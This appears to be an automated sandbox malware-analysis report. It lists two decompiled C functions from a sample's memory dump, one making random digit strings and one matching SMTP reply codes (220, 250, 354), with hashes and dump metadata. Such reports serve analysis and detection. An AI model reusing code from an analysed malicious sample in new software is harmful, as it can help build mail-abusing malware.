                                                                                                                                                                                                                                                                  • Opcode ID: 0166d1c61362cc5cca83285e76851ac5df41606905941d780b6e3e6031134fb5
                                                                                                                                                                                                                                                                  • Instruction ID: 98db1483c19df9b74aa7256952d235f2ccefa0baf4a8ddddcd0881b92e586b15
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0166d1c61362cc5cca83285e76851ac5df41606905941d780b6e3e6031134fb5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17F05E7161830AAFDF48CE54DC04BAB37A8BB04345F008818BA298A2D0D3B4D5508B90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                                                                                                                                                  			E00901320(void* __ecx, intOrPtr _a4, char* _a8) {
                                                                                                                                                                                                                                                                  				char _v8;
                                                                                                                                                                                                                                                                  				signed int _t19;
                                                                                                                                                                                                                                                                  				void* _t32;
                                                                                                                                                                                                                                                                  				void* _t33;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				 *_a8 = 0;
                                                                                                                                                                                                                                                                  				srand(GetTickCount());
                                                                                                                                                                                                                                                                  				_t33 = _t32 + 4;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				while(_v8 < _a4) {
                                                                                                                                                                                                                                                                  					_t19 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					_push(_t19 % 0xa);
                                                                                                                                                                                                                                                                  					_push(_a8);
                                                                                                                                                                                                                                                                  					sprintf(_a8, "%s%d");
                                                                                                                                                                                                                                                                  					_t33 = _t33 + 0x10;
                                                                                                                                                                                                                                                                  					_v8 = _v8 + 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_a8[_v8] = 0;
                                                                                                                                                                                                                                                                  				return _a8;
                                                                                                                                                                                                                                                                  			}







                                                                                                                                                                                                                                                                  0x00901327
                                                                                                                                                                                                                                                                  0x00901331
                                                                                                                                                                                                                                                                  0x00901336
                                                                                                                                                                                                                                                                  0x00901339
                                                                                                                                                                                                                                                                  0x0090134b
                                                                                                                                                                                                                                                                  0x00901353
                                                                                                                                                                                                                                                                  0x00901358
                                                                                                                                                                                                                                                                  0x00901360
                                                                                                                                                                                                                                                                  0x00901364
                                                                                                                                                                                                                                                                  0x0090136e
                                                                                                                                                                                                                                                                  0x00901373
                                                                                                                                                                                                                                                                  0x00901348
                                                                                                                                                                                                                                                                  0x00901348
                                                                                                                                                                                                                                                                  0x0090137e
                                                                                                                                                                                                                                                                  0x00901387

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CountTickrandsprintfsrand
                                                                                                                                                                                                                                                                  • String ID: %s%d
                                                                                                                                                                                                                                                                  • API String ID: 2526408171-1110647743
                                                                                                                                                                                                                                                                  • Opcode ID: 9f5452df578a892f0bbb5ed427e043fba462b8e5cf8ad7ebaefb54441c6d5d72
                                                                                                                                                                                                                                                                  • Instruction ID: 0846830b973e15aaa5fe6792837b82ba886a59a44677cf49756ce258be04dfee
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f5452df578a892f0bbb5ed427e043fba462b8e5cf8ad7ebaefb54441c6d5d72
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38F04F71A04148EFDB04DF98D845B6D77B9EF85304F10C088F8094B381D635BF009B66
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E009011C0(char* _a4) {
                                                                                                                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                                                                                                                  				signed int _v24;
                                                                                                                                                                                                                                                                  				void* _t23;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v20 = 0x903148;
                                                                                                                                                                                                                                                                  				_v16 = 0x90314c;
                                                                                                                                                                                                                                                                  				_v12 = 0x903150;
                                                                                                                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                                                                                                                  				while(_v24 < 3) {
                                                                                                                                                                                                                                                                  					if(StrCmpNA(_a4,  *(_t23 + _v24 * 4 - 0x10), 3) == 0) {
                                                                                                                                                                                                                                                                  						_v8 = 1;
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						_v24 = _v24 + 1;
                                                                                                                                                                                                                                                                  						continue;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					break;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v8;
                                                                                                                                                                                                                                                                  			}









                                                                                                                                                                                                                                                                  0x009011c6
                                                                                                                                                                                                                                                                  0x009011cd
                                                                                                                                                                                                                                                                  0x009011d4
                                                                                                                                                                                                                                                                  0x009011db
                                                                                                                                                                                                                                                                  0x009011e2
                                                                                                                                                                                                                                                                  0x009011f4
                                                                                                                                                                                                                                                                  0x00901210
                                                                                                                                                                                                                                                                  0x00901214
                                                                                                                                                                                                                                                                  0x00901212
                                                                                                                                                                                                                                                                  0x009011f1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x009011f1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00901210
                                                                                                                                                                                                                                                                  0x00901225

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • StrCmpNA.SHLWAPI(354,220,00000003), ref: 00901208
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.518157757.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518125135.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518204360.0000000000903000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518254273.0000000000904000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.518294900.0000000000905000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_900000_2350331867.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 220$250$354
                                                                                                                                                                                                                                                                  • API String ID: 0-1679323658
                                                                                                                                                                                                                                                                  • Opcode ID: e47f664cdf093df6bfc8f6e2fdedcb440b8541e4d3963bb4edbf28bc80c1245b
                                                                                                                                                                                                                                                                  • Instruction ID: f46cf407c0184d6817838355c8296775b3fb89d3b64f562ec1110c1cb7e37b85
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e47f664cdf093df6bfc8f6e2fdedcb440b8541e4d3963bb4edbf28bc80c1245b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 74F0A970909209EFCF14DFD8CA487AEBBF8BB15704F208458D515AB280D3759B44DBA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%